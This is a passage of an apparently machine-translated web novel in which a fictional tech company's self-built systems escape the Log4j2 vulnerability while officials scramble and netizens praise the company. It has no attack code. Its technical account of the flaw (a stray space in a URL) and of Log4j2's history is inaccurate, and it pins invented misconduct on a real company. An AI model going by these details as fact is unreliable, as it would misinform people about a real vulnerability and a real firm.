"How is it? Is our loss big?" Wen Liang's face was calm and his mind was calm.
You are right to pay attention to it, but things have already happened and you have to accept them no matter what. There is no need to embarrass yourself, just face it and it will be over.
Li Ze's hearty laughter came from the receiver: "Don't worry, we still have zero losses!"
"Um?"
"Are you curious?"
"Of course, the news Lao Miaotou gave me could be so serious that even he knows about it..."
"I see!"
As he spoke, Li Ze suppressed his smile: "I knew there was someone around you and it took a lot of time to investigate, so I didn't rush to contact you. Judging from the current situation, it is certain that the impact on us will be minimal and can be ignored.
.”
Then Li Ze explained the situation in detail: "Of all our external service systems, only this log component was used in the early days when Apache was first launched. Later, we abandoned it because of its open source nature."
"Among them, because we have spent a lot of effort on independent research and development of the Star Cloud system, almost all third-party open source components are only used as reference and will not be incorporated into the official version, so external enterprise-level products such as Star Cloud services will not be affected.
.”
"And the Star Service System, which is currently gradually entering pilot operation, rarely introduces third-party open source components."
"On the other hand, because of the completely independent research and development nature of the Star system, the definitions of some modules are completely different from the current mainstream systems. For example, a large part of the command lines and even the method of calling parameters that are suitable for other system platforms have some definitions.
The differences in levels...this was because we wanted to avoid various patent infringement risks."
"In short, thanks to the compliance and autonomy you emphasized at the beginning, although all our independent platforms had a very difficult time in the early stages and needed to build a new system, it is precisely because of this that they are unique.
Safety."
After saying this, Li Ze turned to say: "According to feedback from the network security department under the group's network security and user privacy department, this vulnerability has been submitted to Apache by Alibaba Cloud. According to reliable information, Apache has begun testing the patch plan. No.
It will be launched on the same day.”
"After extensive analysis, relevant personnel of the company have assessed the scope of impact of this log component vulnerability, which is more serious than very serious. It is estimated to be the most serious computer vulnerability discovered in recent years!"
"The threshold for attack is unimaginably low, and the operating permissions an attacker can gain by exploiting vulnerabilities are unlimited! And according to incomplete statistics, almost all Java class frameworks use this log component, and its wide range of use is also rare."
After listening to Li Ze's brief description, Wen Liang laughed: "Get ready, the Ali family is going to suffer a big disaster."
"How do you say it?" Li Ze was not anxious and excited, and even his tone became serious.
Wen Liang answered patiently: "Alibaba Cloud discovered the vulnerability and reported it to Apache, the development industry organization. Even if it is just a priority report, and the scope of the vulnerability is known to be shared with relevant authorities including the Industry and Information Technology in subsequent exchanges, it will be fine.
;
But Alibaba Cloud did not. Not only did it not share when it was discovered, but it also did not share it after knowing about the serious situation. Even though the Industry and Information Technology Group has proactively discovered the vulnerability, it still did not ventilate it...
But the vulnerability has a wide impact, the threshold for attack is low, and the attack is ubiquitous. And at this critical moment, if you say he won’t suffer, who will?”
Li Ze quickly thought of the key point: "In my impression, the processes of the relevant units are not very clear, and Alibaba Cloud is an ordinary enterprise. Can you find an excuse to explain?"
Wen Liang asked back: "Do you think Alibaba Cloud's business is broad based on its current development trend?"
"I understand." Li Ze then became excited, "I will prepare well, just wait and see the show. We were unable to obtain patent authorization in the early stage, and we were unable to obtain new authorization due to artificial restrictions from America.
Every penny spent on research and development will be earned back in the near future!”
Wen Liang was very calm: "Don't come forward first, wait for the announcement from the work letter, and don't notify your friends and businessmen. Someone will take the initiative to notify them when they can be informed. Let's not meddle in other people's business."
Li Ze responded.
After ending the call, Wen Liang flipped through his phone and checked a company email that was copied to him a few minutes ago. The content briefly described the causes, consequences and scope of the vulnerability in a component called Log4j2.
There is no abbreviation of the technical analysis process just because the recipient of the email may not be technologically savvy.
Bolang's internal process has some regulations. It's not that there are no things that are confusing, but as long as you have the brains, you won't copy the confusing things to Wen Liang and other senior executives.
Wen Liang and the others may not understand technology, but in such a big company like Bolang, can't they find anyone who understands technology?
And as long as people in the pan-technical department bring their brains to work, they should know that the two main technical chief engineers who often appear in the company are members of the founding team.
One is Li Bowen and the other is Sun Baoyin.
Not to mention that Zhang Yulin, another member of the founder team, is the chief engineer of the self-developed operating system... It is more enjoyable to go out and fool around with technical content than to voluntarily resign.
In fact, if Wen Liang is asked to type the code, he really won't be able to type it, but if he is asked to see the principles of the technical process... Haha, you can tell whether he can understand it.
These few things are indeed vague if there is no reference, but if there is real content in front of you, they can be easily connected.
After flipping through the pages for three minutes, Wen Liang sighed and said, "This is all a flaw in inertial thinking. If I was still in a technical position at that time, I might have discovered this thing..."
"How dare you believe that human input is correct every time...Tsk, tsk, tsk..."
He really wasn't bragging.
There is a reason why Li Ze said that the attack threshold of this vulnerability is so low. It is just a simple input error...for example, adding a space when entering the URL...can bypass various verifications and directly enter the target URL.
The accessed machine or even the entire local area network can execute preset arbitrary content, which is arbitrary content.
Reading files, etc. is just a piece of cake.
The Log4j2 log component is very powerful, but unfortunately the judgment of various parameters is not rigorous.
In short, with the modular thinking that Wen Liang used when writing code, it is easy to find that the judgment conditions defined in the native component code are not rigorous.
So...according to later Alibaba Cloud's defense, saying that the seriousness of the vulnerability was not known at the initial stage is a public relations term.
It has nothing to do with technology at all.
It's just that within the Alibaba department, it's really... a bit bad.
Not only did the upper management have no relevant thoughts, but even the technical level may not have thought of notifying domestic authorities to prevent network security risks.
Because this is a very low-level but serious mistake that you will know later.
…………
At around 8 o'clock in the evening, Wen Liang had just returned to the hotel where he was staying, when Lao Miao's secretary over there was summoned to Lao Miao's house.
An engineer supervisor came with the secretary.
I personally participated in the handling of this serious vulnerability.
The old man's face was gentle and elegant, and his sitting posture was dignified and majestic. He looked like a big man, unlike the casual look he had about half an hour ago.
Even her hair, which was a little loose before, has become meticulous again.
The secretary had been following Lao Miaotou for several years, and of course he knew his temperament, so he took the initiative to report directly: "Through cooperation with neighboring units and emergency inspections and repairs, the loopholes in the main servers of all key units have been completely repaired, and a simple system has been formed.
Temporary workaround solution.”
"According to current statistics, the external servers of several key units such as National Defense Science and Industry have evidence that there have been intrusions through this vulnerability, and some data have been illegally accessed, with a total number of more than a thousand times...
Some of these units have recently suffered massive cyber attacks, which are suspected to be related to this vulnerability."
"A certain unit may have confidential electronic files that have been illegally accessed..."
After finishing the description, the secretary took a breath: "Based on preliminary joint research and judgment with neighboring units, the potential losses caused by this vulnerability may exceed Prism."
"The simplicity of this vulnerability and the depth of the attack... are really too rare. According to reliable sources, Apache will classify this vulnerability as 10 points, the highest level in the CVSS general vulnerability scoring system, which is extremely dangerous."
After the secretary finished the report, he looked at the engineer supervisor who came with him: "For other aspects, please ask the forest engineer to supplement."
Lin Gong did his part and added the key points: "After systematic analysis, the principle of this vulnerability is very simple. Once discovered, the danger level can be easily judged. Under normal circumstances, the triggering concept is not big, but the triggering threshold is very low. In total, only three lines of code need to be written.
.”
“...In addition, based on comprehensive information from neighboring units, the internal system of key units based on the Star Kernel cannot be loaded with the vulnerability log component, and does not support one of the JNDI interfaces that triggers the vulnerability, so it cannot be attacked at all.
, also includes all operating system products derived from the Star kernel;
Among them, the unit piloted Xingchen Cloud for non-critical services, so it does not have this vulnerability."
“This vulnerability has been found in all Alibaba Cloud products that are commonly used. Alibaba Cloud’s maintenance engineers have not reported the vulnerability so far, nor have they implemented temporary circumvention solutions..."
The old man couldn't help but curse in his heart: "Fuck."
He was really speechless.
How come you can have such a unit when riding a horse!
He is such an elegant and easy-going person!
I couldn't help but get fucked.
Later, Laomiaotou made a decision: "Now that a temporary avoidance solution has been formed and a preliminary conclusion has been drawn, the risk will be notified to a wider range of people immediately."
"A formal announcement will be made in three hours."
The secretary took note of the instructions and made his own suggestion after deliberation: "Should we wait until daytime tomorrow?"
Lao Miaotou directly rejected it: "There is no need to wait any longer."
After that, the secretary first helped send the forest worker out of Lao Miao's house, and then turned back. He knew that Lao Miao had instructions.
Lao Miaotou directly arranged: "Initiate a meeting tomorrow morning to discuss the construction of information security risk standards and how to form a normalized information security prevention organization."
"Should the decision to punish Alibaba Cloud be reflected in the announcement?" the secretary asked a special question.
Lao Miaotou shook his head: "We will decide after everyone discusses it."
Finally, he said: "Tell Wen Liang the performance results of Xingchen and Xingchenyun."
The secretary nodded again.
…………
A little later, Wen Liang received the message notification.
Wen Liang notified Li Ze again, asking him to be ready to attack at any time.
In this way, because of a loophole, the technical support departments of countless Internet companies and information technology companies in the country were all busy in the middle of the night.
Although the damage may have been caused, it is precisely because of this that we must seize every minute to deal with the loopholes quickly to avoid causing new losses.
You can't say that if one person comes in as a bad person, he is a bad person, and if ten people come in as a bad person, he is also a bad person.
Subsequently, at around 11 o'clock in the night, the Cybersecurity Bureau under the Industry and Information Technology Bureau issued a work update announcement.
"Cybersecurity Risk Tips Regarding Major Security Vulnerabilities in Apache Log4j2 Component"
The announcement content states:
"The Apache Log4j2 component is an open source log framework based on the Java language and is widely used in business system development. Recently, Alibaba Cloud Computing Co., Ltd. discovered that the Apache Log4j2 component has a remote code execution vulnerability and informed the vulnerability of the vulnerability.
The Apache Software Foundation…
On October 25, network security staff discovered serious security vulnerabilities in the Apache Log4j2 component during routine inspections, and have carried out vulnerability risk analysis, investigation and repair...
This vulnerability may lead to remote control of the device, which may lead to the theft of sensitive information, interruption of device services and other serious harms. It is a high-risk vulnerability...
In order to reduce network security risks, relevant units and the public are reminded to pay close attention to the release of the official patch for the Apache Log4j2 component vulnerability, and a temporary solution is now being released.
Cybersecurity will continue to organize and carry out vulnerability disposal work to prevent the risk of network product security vulnerabilities and maintain public Internet network security..."
The late-night announcement naturally quickly touched various groups.
It was also quickly spread widely.
It triggered various discussions among netizens who are night owls and eat melons.
Soon, programmers who were always good at staying up late began to express their concern about the incident through various channels.
Netizens also had a lively chat.
"The response from the Industry and Information Technology Department was so fast this time, and a temporary solution was actually completed, which was a bit surprising."
"I'm a liberal arts student who doesn't understand these things, but I found an interesting point from the announcement. This vulnerability was discovered by Alibaba Cloud, but it only notified Apache and not the network security. The network security discovered it on its own.
Is there anyone who knows how much impact this vulnerability has?"
Being bald is my dignity as a strong man: "I just read about the temporary solution and the vulnerability situation. How can I tell you the scope of the impact... As long as it is a network-connected machine and this component is used, the underwear can be seen. According to the
As far as I know, Log4j2 is a log component project launched by Apache last year;
The purpose is to deal with the new work Slf4j by the author who joined Apache and then quit Apache and developed Log4j... In short, because Apache under the Apache organization is the world's number one web server, so... Log4j2 is now
You know the scope of use."
Staying up late is my protective color: "I can only say that I broke out in a cold sweat. I feel a little bit ruined anyway."
Every time you sacrifice a hair, you can gain skill +1: "I discovered an interesting thing. Bolang may be the best player to win this vulnerability. Out of curiosity, I just built a self-built environment to reproduce the vulnerability, because
I also prefer new things, so I have a Xinghai workstation... When I tried to set up the environment, I found that the Xingchen desktop system does not support this log component. The official documentation has its own log component, and it does not support the JNDI interface;
Interestingly, I then opened the ‘Star Spiritual Realm’ to run Windows, successfully reproduced the vulnerability, and performed the attack operation...
Fortunately, 'Xingchen Lingjing' runs in a popular special sandbox mode. You can freely manipulate any content of the running Windows system through attacks, including reading files, but it will not affect the main system Xingchen desktop. In other words, no matter how you do it,
Star systems are not affected by this ultra-rare and dangerous vulnerability."
I am a player who can't sleep every day so I eat melon at night: "6666, there is such an operation, doesn't that mean that the Star System is currently the safest system in the world?"
"I think I finally found a way to fight back against all the people on the Internet who criticized Bolang for reinventing the wheel!!!"
